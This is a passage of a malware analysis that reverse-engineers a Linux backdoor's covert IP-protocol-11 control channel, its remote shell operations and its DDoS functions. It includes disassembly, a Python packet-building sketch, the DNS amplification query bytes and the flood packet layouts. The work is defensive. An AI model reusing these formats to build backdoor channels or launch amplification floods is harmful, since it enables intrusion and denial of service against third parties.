Otherwise: 0x8048fd8: movl %esi,0xffffffc4(%ebp) 0x8048fdb: leal 0x14(%esi),%edi 0x8048fde: movl %edi,0xffffffc0(%ebp) 0x8048fe1: leal 0x16(%esi),%edi 0x8048fe4: movl %edi,0xffffffc8(%ebp) %esi is obviously recorded, and a few pointers appear to be setup at offsets of 20 and 22 bytes from it. These are also recorded. 0x8048fe7: movl 0x8(%ebp),%edi The very first parameter, IP_Address (points to a buffer containing an IP address) is copied to %edi. A slow (but simple) technique is then used: 0x8048fea: movb (%edi),%al 0x8048fec: movb %al,0xc(%esi) 0x8048fef: movb 0x1(%edi),%al 0x8048ff2: movb %al,0xd(%esi) 0x8048ff5: movb 0x2(%edi),%al 0x8048ff8: movb %al,0xe(%esi) 0x8048ffb: movb 0x3(%edi),%al 0x8048ffe: movb %al,0xf(%esi) This makes the 4 bytes (length of an IP address) be copied from this buffer to a buffer starting at 0xc(%esi). We do it all over again: 0x8049001: movb (%ebx),%al 0x8049003: movb %al,0x10(%esi) 0x8049006: movb 0x1(%ebx),%al 0x8049009: movb %al,0x11(%esi) 0x804900c: movb 0x2(%ebx),%al 0x804900f: movb %al,0x12(%esi) 0x8049012: movb 0x3(%ebx),%al 0x8049015: movb %al,0x13(%esi) A quick look back at 0x8048f9d shows that %ebx should be equal to *0xc(%ebp) (BufferA). Once again, more memory copying takes place, continuing on from earlier. A long setup and call is done: 0x8049018: movzbl 0x3(%ebx),%eax 0x804901c: pushl %eax 0x804901d: movzbl 0x2(%ebx),%eax 0x8049021: pushl %eax 0x8049022: movzbl 0x1(%ebx),%eax 0x8049026: pushl %eax 0x8049027: movzbl (%ebx),%eax 0x804902a: pushl %eax 0x804902b: pushl $0x806768a 0x8049030: leal 0xffffffd0(%ebp),%ebx 0x8049033: pushl %ebx 0x8049034: call 0x804f808 This code has been seen before, and simply uses sprintf() to form a dotted quad located at 0xffffffd0(%ebp). The octets for this are taken from a single buffer (thats something new), BufferA. 0x8049039: pushl %ebx 0x804903a: call 0x8049138 This function is unknown but looks to contain calls to gethostbyname() and a data copying function that was seen earlier. 
Following a successful gethostbyname() chain through the call shows it to return the first IP address matching the hostname in the parameter. One must question why this function is used here where a simple inet_addr() would suffice (as had been done in earlier functions). The return is copied:

    0x804903f: movl %eax,0xfffffff4(%ebp)

And some more values are placed nearby:

    0x8049042: movw $0xa,0xfffffff2(%ebp)
    0x8049048: movw $0x2,0xfffffff0(%ebp)

This could well be a sockaddr_in structure (family 2 being AF_INET), if the port was set to 0xa? Now the old favourites show their faces:

    0x804904e: movb $0x45,(%esi)
    0x8049051: movb $0xfa,0x8(%esi)
    0x8049055: movb $0xb,0x9(%esi)

%esi was earlier set to the return of the function call to 0x805bd74. It is quite possible this function was some kind of malloc (or even malloc itself!). Whatever it was, it would appear a packet buffer is being created, starting at %esi. Firstly, we see the well known 0x45 IP version / internet header length combination placed at the start. This is followed by 0xfa (250) being placed in the IP TTL field. Following this, the IP protocol is set to 0xb (11). This is the same protocol that was listened to in the main() section of this binary. More packet setup:

    0x804905c: movw 0x14(%ebp),%ax
    0x8049060: addw $0x16,%ax
    0x8049064: xchgb %al,%ah
    0x8049066: movw %ax,0x2(%esi)

This places the value of DataAmount + 0x16, after being htons()'d, into the total length field of the IP header.

    0x804906a: movb $0x0,0x1(%esi)

0 is placed into the IP TOS field. random() is called, and the two low bytes of the return are swapped:

    0x804906e: call 0x8056058
    0x8049073: xchgb %al,%ah
    0x8049075: movw %ax,0x4(%esi)

The result is stored in the IP ID field.

    0x8049079: movw $0x0,0x6(%esi)
    0x804907f: movw $0x0,0xa(%esi)

The IP fragment offset is set to 0, as is the checksum. Starting at 0x8049085, checksum code appears to begin, looping across 20 bytes (the IP header).
Eventually:

    0x80490cf: movw %ax,0xa(%edi)

The checksum is put into place, followed by:

    0x80490d3: movl 0xffffffc0(%ebp),%edi
    0x80490d6: movb $0x3,(%edi)

0xffffffc0(%ebp) was referenced much earlier, where it was set to an offset of 0x14 bytes from %esi, the start of the packet buffer. This means it corresponds to the position directly after the IP header. A value of 0x3 is placed into this position. A function call is set up and made:

    0x80490d9: movl 0x14(%ebp),%edi
    0x80490dc: pushl %edi
    0x80490dd: movl 0x10(%ebp),%edi
    0x80490e0: pushl %edi
    0x80490e1: movl 0xffffffc8(%ebp),%edi
    0x80490e4: pushl %edi
    0x80490e5: call 0x805652c

Once again, 0x805652c is a call to some kind of data copy function. Going by a previous analysis of it, DataAmount bytes would be copied from BufferB to *0xffffffc8(%ebp). The destination was earlier set to 0x16(%esi), which corresponds to 2 bytes after the IP header. With the data copied, it seems a sendto() is next:

    0x80490ed: pushl $0x10
    0x80490ef: leal 0xfffffff0(%ebp),%eax
    0x80490f2: pushl %eax
    0x80490f3: pushl $0x0
    0x80490f5: movl 0x14(%ebp),%eax
    0x80490f8: addl $0x16,%eax
    0x80490fb: pushl %eax
    0x80490fc: pushl %esi
    0x80490fd: movl 0xffffffbc(%ebp),%edi
    0x8049100: pushl %edi
    0x8049101: call 0x8056c3c

0xffffffbc(%ebp) is the stored copy of the earlier socket() return. %esi is obviously the beginning of the packet buffer. DataAmount + 0x16 (IP header + 2) is used as the amount of data to send. And finally, 0xfffffff0(%ebp) does indeed turn out to be a sockaddr_in structure, as initially believed.
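The packet layout recovered above can be summarised in a short sketch. This is not the blackhat's code: build_covert_packet and ip_checksum are hypothetical names, the checksum is assumed to be the standard Internet checksum (the binary's loop was not verified), and the byte at offset 21, which the binary never seems to set, is simply filled with 0 here.

```python
import struct

def ip_checksum(header: bytes) -> int:
    """Standard Internet checksum (assumed, not verified against the binary)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_covert_packet(src_ip: bytes, dst_ip: bytes, data: bytes, ip_id: int) -> bytes:
    """Lay out a packet the way Network_Function_F appears to (hypothetical helper)."""
    total_len = len(data) + 0x16            # 20-byte IP header + 2 extra bytes + data
    header = struct.pack(
        "!BBHHHBBH4s4s",
        0x45,                               # version 4, IHL 5
        0x00,                               # TOS
        total_len,                          # total length (network byte order)
        ip_id & 0xFFFF,                     # ID, random() in the binary
        0x0000,                             # flags / fragment offset
        0xFA,                               # TTL 250
        0x0B,                               # protocol 11
        0x0000,                             # checksum placeholder
        src_ip,                             # IP_Address -> offset 0xc
        dst_ip,                             # BufferA    -> offset 0x10
    )
    header = header[:10] + struct.pack("!H", ip_checksum(header)) + header[12:]
    # Offset 0x14 gets the value 3; offset 0x15 is left unset by the binary
    # (0 is an assumption); BufferB is copied to offset 0x16.
    return header + b"\x03" + b"\x00" + data

packet = build_covert_packet(bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]), b"A" * 400, 0x1234)
```

The addresses used are documentation-range placeholders. Actually sending such a buffer would need a raw socket and root privileges, which is left out of the sketch.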
The return from sendto() is examined:

    0x8049109: cmpl $0xffffffff,%eax
    0x804910c: jne 0x8049118

If it was -1 (error):

    0x804910e: pushl %esi
    0x804910f: call 0x805c290
    0x8049114: xorl %eax,%eax
    0x8049116: jmp 0x804912c

Else:

    0x8049118: movl 0xffffffbc(%ebp),%edi
    0x804911b: pushl %edi
    0x804911c: call 0x8057160
    0x8049121: pushl %esi
    0x8049122: call 0x805c290
    0x8049127: movl $0x1,%eax

The calls to 0x805c290 are unknown, but given the assumption that a malloc or derivative was used earlier to return %esi, it is quite likely that this call is a free(). 0x8057160 is a close() call, done on the socket descriptor. This network function then returns. It should be noted that a return of %eax = 0 means an error occurred, while 1 means it was successful.

Disassembly Review:
Finally, a simple, straightforward network function! It would appear that IP_Address is a pointer to a 4 byte buffer containing the source IP for the created packet. BufferA is a similar buffer, but with the destination IP for the packet. BufferB is a pointer to a buffer with DataAmount bytes to send as the contents of the packet. It should be noted that 2 extra bytes exist between the IP header and this "data". The first of these is set to 3, and the second does not seem to be set at all. It is unclear what this byte is, or what it would normally be for a sent packet.

Function Overview:
FINALLY! We have all the information to solve the many little puzzles of this code (primarily, the first two case sections in the main() section). This function appears to be the backchannel from this binary to the blackhat, using covert IP protocol 11 packets. A re-examination of the first two case sections needs to be done with this new information. This analysis will follow this function, and is named Re-Examination_A. The network traffic generated by this function will be examined in Network_Analysis_B.

Re-Examination_A - A look back on case sections 1 and 2 from main().
Reason:
With the analysis of Network_Function_A and Network_Function_F, new information is available which opens the doors wide on some earlier code whose purpose could not be identified.

Code Blocks Re-examined:
    0x0804835c (Case section 1 - main())
    0x080483f0 (Case section 2 - main())

New information:
Network_Function_A and Network_Function_F

Analysis:

0x0804835c - Case section 1.

This code is initially quite complex. The main component of this section appears to be the creation of a buffer starting at 0xfffff800(%ebp). Initially we see Global_A placed into the first byte of this buffer. When we look back through all the code, Global_A actually never gets set anywhere! This assignment is either some kind of legacy code, preparation for future modifications, or an error (unless someone else can show where it is used!??!).

The next two bytes are obviously set to 1 and 7. The purpose of these is unclear, but they are assumed to mean something to the client, perhaps an ID for the binary, or a version.

PID_Var_B appears to be used next. This variable was used to store the PID of any fork()s that were running. In many cases (with the packetting functions at least), more functions would refuse to run while another was running, all judged off PID_Var_B. The interesting thing is, if PID_Var_B is 0, the next buffer byte is a 0; if not, it is a 1. This *might* be some kind of indication for the blackhat that their binary is doing something (busy?).

What backs this up is that if PID_Var_B is indeed non-zero (indicating something is happening), the next byte of this buffer is set to Global_C. What is Global_C again? It was a global variable that was always assigned a number which seemed to be based upon the case statement. Effectively, if for instance case section 10 was forked out and running, Global_C would be 10. The same goes for many of the other case sections (the long-term ones). This means that this buffer now contains information about the "status" of the binary, i.e. is it running anything, and if so, what?

The code picks up again at 0x80483a7 where it prepares to call Data_Manipulation_Function_B. This was proven before to be an encoding / decoding function (in this case it looks to be used to encode). random() is called and its return appears to be taken MOD 0xc9 (201), ensuring a value between 0 and 200. 0x190 (400) is then added to this value, and the result (400 to 600) is passed to Network_Function_A, where it has the effect of being the number of data bytes to send.

The first parameter passed to this function, 0xffffbb1c(%ebp), we will see more of in case section 2 of this re-examination. It turns out that it is used to contain the IP address(es) that Network_Function_A sends packets to. We will see how this buffer is constructed soon.

And finally, the second parameter passed to Network_Function_A, 0xffffbb20(%ebp). This buffer is the encoded data from Data_Manipulation_Function_B. This means that the information passed by this case section is encoded using Data_Manipulation_Function_B!

0x080483f0 - Case section 2.

This section is one of the more complex to follow, but uses simplistic programming structures. It uses data from within the packet, which was already looked at earlier. What was unknown at the time was that the packet data would have been encoded for network transfer. The data was then decoded and used for this case section.

The most important part is right at the beginning. Global_B is set to the third byte of the decoded buffer. This is an extremely important variable. The analysis of Network_Function_A revealed that if Global_B was 0, packets would be sent to just one IP. If Global_B was non-zero, 10 IPs would have data sent to them. This all becomes important when one tries to work out what these IP addresses actually are (we will definitely want to know!).

The source IP for Network_Function_F is also set to the destination IP of the packet that resulted in this case section getting executed.
(This is a pretty handy trick since it eliminates interface scouring.)

Back to the destination IP addresses: random() is called at 0x8048440, with the result MOD 0xa, and is stored in %edi. A loop is formed from this point down to 0x8048532. The condition for ending the loop appears to be that 10 iterations have happened (probably a for-loop). The counter for each iteration is %ebx. The first conditional within this loop is:

    0x8048454: cmpl %edi,%ebx
    0x8048456: je 0x804852b

Obviously, the guts of this loop will run on all but one iteration, the exception being when %edi == %ebx. What purpose does this have? We'll soon see!

The purpose of this loop is to set the data buffer starting at 0xffffbb1c(%ebp). This buffer was used in the previous case section (and also in case section 3) as the destination IP(s) to pass to Network_Function_A. In effect, this case section is the blackhat telling the program who to call home! Global_B also had the effect of making Network_Function_A send 1 packet if it was 0, and 10 packets if anything else.

On all other iterations of the loop (%edi != %ebx), Global_B (set a few lines earlier) is checked. If it is 2, it would appear that the data from the decoded buffer is copied directly into indexed positions starting at 0xffffbb1c(%ebp). If Global_B is anything else, the data placed into indexed positions from 0xffffbb1c(%ebp) is randomly generated.

What happens on that one iteration where %edi == %ebx?

If Global_B is 0, the first 4 bytes starting at 0xffffbb1c(%ebp) are set to the first 4 bytes from 0xfffff003(%ebp). Since only one packet is sent by Network_Function_A when Global_B is 0, this is the destination (and most probably the place that the blackhat's client is running on).

If Global_B is 2, 9 of the 10 iterations would have copied data from the decoded buffer (effectively allowing the blackhat to set all of these IPs). What happens on the 10th IP (the one where %edi == %ebx) is a mystery.
It appears to be left as whatever it may have been earlier. (This could be a programming flaw on behalf of the blackhat! It could even lead to working out their client machine's IP.)

If Global_B is anything else, the missing iteration is filled in with the first four bytes from 0xfffff003(%ebp).

This ends this case section. The reasoning behind such a complex system of multiple destinations for packets is obviously one of obfuscation. It most certainly makes things extremely tough to 'prove' just who an attacker is (notice the word prove).

Network_Analysis_A - Incoming covert communications channel.

About:
This binary listens for packets matching a particular description. Upon receiving certain packets, it will perform certain actions. This section will attempt to add some structure, so that what is occurring can be worked out from network traffic.

Packet structure:

IP level:

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |    DDOS 1     |    DDOS 2     |                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               +
   |                                                               |
   +                      COVERT DATA BUFFER                       +
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Special Fields (Necessary):
    Total Length: Must be greater than 200 (well, recv() has to get more than 200 bytes, so theoretically this means the total length on a non-corrupt packet would be > 200).
    Protocol: Must be 11.
    Destination Address: This doesn't necessarily have to be anything, but it is used as the source IP address for any outgoing covert communications (see Network_Analysis_B).
    DDOS1: This must be a 2.
    DDOS2: This byte doesn't seem to be used or checked.
    COVERT DATA BUFFER: This is filled with an encoded buffer that is decoded by Data_Manipulation_Function_A.

Covert Data Buffer decoded:

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |    Unknown    |   Operation   |                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+          DATA BUFFER          +
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

This structure is a DECODED representation of the covert data buffer. The data is analysed and the Operation field is used to control various actions:

Operation Field:
    1: Generates a covert channel response to the blackhat which contains the status of the binary. It could also be a covert packetting tool, but this is extremely unlikely :)
    2: An interesting feature of this binary is the covert packet channel. The binary can generate a single packet to the attacker, or 10 duplicate packets which are sent to different destination IPs. This operation mode tells the binary to choose between the 1 and the 10, and also has the ability to set the various destination IPs. It should be noted that the binary has no 'preset' blackhat address. It can only find it out through this operation. The modes of operation are determined by the first byte of DATA BUFFER:
        0: The next four bytes will be used as the octets of the destination IP, and a single packet is sent for every covert packet generated.
        1: The next four bytes will be used as the octets, but will be placed in a list with 9 other randomly generated IPs. The position of these octets in this list appears random. 10 packets will be sent for every covert packet generated, one to each IP.
        2: IP octets are read directly from the next 40 bytes.
           Due to the complexity of this code, it is unclear whether there is an error in the code whereby one of the IPs will be skipped. (Or does this have some reason that has been overlooked?)
    3: Another innovative feature, a covert 'shell' almost. /bin/csh is called to execute a command that starts at DATA BUFFER. The output of this is then sent back via the covert channel.
    4: Calls Network_Function_B (DNS Amplification Attack)
    5: Calls Network_Function_C (Corrupt packet flood)
    6: Creates a password guarded bind shell.
    7: Executes a command in the same manner as operation 3, except the output is not sent back.
    8: Appears to have the ability to stop any running 'packetting' function, as well as the shell in operation 6.
    9: Calls Network_Function_B (DNS Amplification Attack). The difference between this and the earlier operation is that this one looks to be able to adjust the speed.
    10: Calls Network_Function_D (SYN packet flood)
    11: Calls Network_Function_D (SYN packet flood). The difference from the last operation appears once again to be that this one has an adjustable speed.
    12: Calls Network_Function_E (DNS request flood)

Many of these operation fields have their own format for the rest of the DATA BUFFER. The relevant function analysis, combined with the case sections, can be used as a reference to see what the rest of the buffer does.

Overview:
The main feature of this covert communications channel is that it goes undetected by many popular network monitoring utilities that only listen on known protocols. Communication takes place over an unconnected (and therefore spoofable) protocol. This allows an attacker to VERY anonymously (and very quickly) control many infected machines.

Network_Analysis_B - Outgoing covert communications channel.

About:
There exists the ability to send data to the blackhat via an encoded and covert network channel. The use of this channel seems to be limited to seeing the 'status' of the binary, or being able to see the output of executed commands.
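The destinations of this outgoing channel come from the list that operation 2 builds, so a rough sketch of that loop may help when reading captures. All names here (build_destinations, packets_per_send and their parameters) are hypothetical, and the assumption that mode 2 takes slot i from the i-th group of four bytes in the decoded buffer is a guess; the disassembly only shows "indexed positions".

```python
import random

def build_destinations(mode, client_ip, decoded_ips, previous, rng=random):
    """Rebuild the 10-slot destination list as case section 2 appears to.

    mode        -- first byte of DATA BUFFER (Global_B)
    client_ip   -- the four octets that follow the mode byte
    decoded_ips -- ten 4-byte entries from the decoded buffer (assumed layout)
    previous    -- whatever the list held before this operation ran
    """
    slots = list(previous)
    skip = rng.randrange(10)                 # random() MOD 0xa, kept in %edi
    for i in range(10):                      # loop counter, kept in %ebx
        if i != skip:
            if mode == 2:
                slots[i] = decoded_ips[i]    # blackhat-supplied address
            else:
                slots[i] = bytes(rng.randrange(256) for _ in range(4))
        elif mode == 0:
            slots[0] = client_ip             # first 4 bytes of the list
        elif mode != 2:
            slots[i] = client_ip             # hidden among the random decoys
        # mode 2 on the skipped slot: nothing is written (the "mystery" case)
    return slots, skip

def packets_per_send(mode):
    """Network_Function_A sends 1 packet when Global_B is 0, else 10."""
    return 1 if mode == 0 else 10
```

For example, build_destinations(1, bytes([192, 0, 2, 7]), [], [b"\x00" * 4] * 10) returns a list with nine random addresses and the placeholder client address at the returned index.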
Packet structure:

IP level:

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |    DDOS 1     |    DDOS 2     |                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               +
   |                                                               |
   +                      COVERT DATA BUFFER                       +
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Special Fields:
    Version: 4
    IHL: 5
    TOS: 0
    Total Length: random between 422 and 622 bytes
    ID: random
    Flags / Fragment Offset: 0
    TTL: 250 (start)
    Protocol: 11
    Checksum: Believed to be correct (but unchecked)
    Source Address: infected machine
    Destination Address: Up to 10 addresses that can be random, or manually set by the blackhat. The blackhat would most probably (but by no means has to) be running a client for this backdoor on one of these addresses.
    DDOS1: 3
    DDOS2: Unknown
    COVERT DATA BUFFER: Contains encoded data, as encoded by Data_Manipulation_Function_B.

Overview:
The main feature of this channel is its ability to send 'decoy' packets along with one to a real client. Decoy packets have often been used for scanning networks; it now looks like they are being used in DDOS utils and backdoors too.

Network_Analysis_C - DNS amplification attack

About:
The DNS system looks to be abused by Network_Function_B. A stream of UDP packets has been identified being sent to the DNS port of over 11 thousand IPs which are hardcoded into the binary. This has not been proven to be an amplification attack as yet, but there is little doubt that it will be.
Packet structure:

IP level:

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |        UDP Source Port        |      UDP Destination Port     |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           UDP length          |          UDP Checksum         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |            DNS ID             |Q| OPCDE |A|T|R|A|  Z  | RCODE |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |            QDCOUNT            |            ANCOUNT            |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |            NSCOUNT            |            ARCOUNT            |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                        DNS QUERY DATA                         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Special Fields:
    Version: 4
    IHL: 5
    TOS: 0
    Total Length: Between 48 and 53 bytes (depending on data)
    ID: random 0-254
    Flags / Fragment Offset: 0
    TTL: Random 120 to 250
    Protocol: 17 (UDP)
    IP Checksum: Believed to be correct (but unchecked)
    Source Address: Primary victim of attack
    Destination Address: One of 11441 IP's (See Appendix A). These IP's are cycled through.
    UDP Source Port: Manually set by blackhat, or random 0-30000
    UDP Dest Port: 53 (DNS)
    UDP Length: 28 to 33 (depending on data)
    UDP Checksum: 0
    DNS ID: Random
    Q(Query/Resp): 0 (Query)
    OPCODE: 0 (Standard Query)
    A(Authoritative): 0
    T(Truncated): 0
    R(Recursion D): 1
    A(Recursion A): 0
    Z: 0
    RCODE: 0
    QDCOUNT: 1 (1 Question)
    ANCOUNT: 0
    NSCOUNT: 0
    ARCOUNT: 0
    DNS QUERY DATA: A loop is present in the code that cycles through the following QUERY data:

    "0x03 0x63 0x6F 0x6D 0x00 0x00 0x06 0x00 0x01"
        QNAME: ".com" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
    "0x03 0x6E 0x65 0x74 0x00 0x00 0x06 0x00 0x01"
        QNAME: ".net" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
    "0x03 0x64 0x65 0x00 0x00 0x06 0x00 0x01"
        QNAME: ".de" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
    "0x03 0x65 0x64 0x75 0x00 0x00 0x06 0x00 0x01"
        QNAME: ".edu" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
    "0x03 0x6F 0x72 0x67 0x00 0x00 0x06 0x00 0x01"
        QNAME: ".org" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
    "0x03 0x75 0x73 0x63 0x03 0x65 0x64 0x75 0x00 0x00 0x06 0x00 0x01"
        QNAME: ".usc.edu" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
    "0x03 0x65 0x73 0x00 0x00 0x06 0x00 0x01"
        QNAME: ".es" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
    "0x03 0x67 0x72 0x00 0x00 0x06 0x00 0x01"
        QNAME: ".gr" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
    "0x03 0x69 0x65 0x00 0x00 0x06 0x00 0x01"
        QNAME: ".ie" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)

Overview:
This function obviously creates DNS requests, and throws them off to a list of 11441 IPs. In looking at the hostnames, it becomes quite apparent that many of these are DNS servers. In investigating 20 of these servers randomly, 17 gave valid responses to questions, 2 refused any query, and 1 was unreachable. This would suggest the list isn't new, or that the people in charge of these servers have noticed attacks and have acted to block them.

The attack is most certainly a form of bandwidth amplification attack. A request (as seen above) is on average 41 bytes.
In sniffing responses to the above queries (generated by host -t ns QNAME), responses are roughly 500 bytes long. This means roughly 12x amplification (500 / 41) is achieved. Unfortunately, DNS traffic is quite difficult to filter while still maintaining normal operations, making this a difficult attack to defend against.

One thing that does stand out is that the UDP checksum is 0. It is unclear whether this will remain 0 when the packet is sent out.

Network_Analysis_D - UDP / ICMP corrupt packet flood attack

About:
The purpose behind the packets sent out by Network_Function_C is unknown. The contents of these packets appear to be IP fragments that carry less data than the header indicates.

Packet structure:

IP level:

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Special Fields:
    Version: 4
    IHL: 5
    TOS: 0
    Total Length: 10268
    ID: 1109
    Flags / Fragment Offset: Offset = 8190 (flags = 0)
    TTL: Random 120 to 250
    Protocol: 1 (ICMP) / 17 (UDP)
    IP Checksum: Believed to be correct (but unchecked)
    Source Address: Can be set to a single IP, or randomised
    Destination Address: This is the primary victim of the attack.

The traffic generated by Network_Function_C can take one of two forms: ICMP, or UDP. This is decided by the blackhat, and is not a mix.
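As a small worked example of why these header values look odd, the sketch below does the arithmetic on the fragment offset and total length listed above. It assumes that 8190 is the raw value of the 13-bit fragment offset field, which counts in units of 8 bytes (8190 is not a multiple of 8, so it is unlikely to be a byte offset). fragment_extent is a hypothetical helper name, and nothing here says what the blackhat intended.

```python
MAX_IP_DATAGRAM = 65535   # largest value the 16-bit Total Length field can hold
IP_HEADER_LEN = 20        # IHL of 5 means a 20-byte header

def fragment_extent(offset_field, total_length, header_len=IP_HEADER_LEN):
    """Return (start, claimed_payload, end) in bytes for one fragment."""
    start = offset_field * 8                  # offset field is in 8-byte units
    claimed_payload = total_length - header_len
    return start, claimed_payload, start + claimed_payload

start, claimed, end = fragment_extent(8190, 10268)
exceeds_limit = end > MAX_IP_DATAGRAM
```

Under that assumption the fragment claims to start 65520 bytes into the original datagram and to carry 10248 bytes, which would end at byte 75768, well past the 65535 byte limit for an IP datagram.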
The following are the relevant second-level headers:

ICMP:

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |     Type      |     Code      |          Checksum             |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |      Internet Header + 64 bits of Original Data Datagram      |
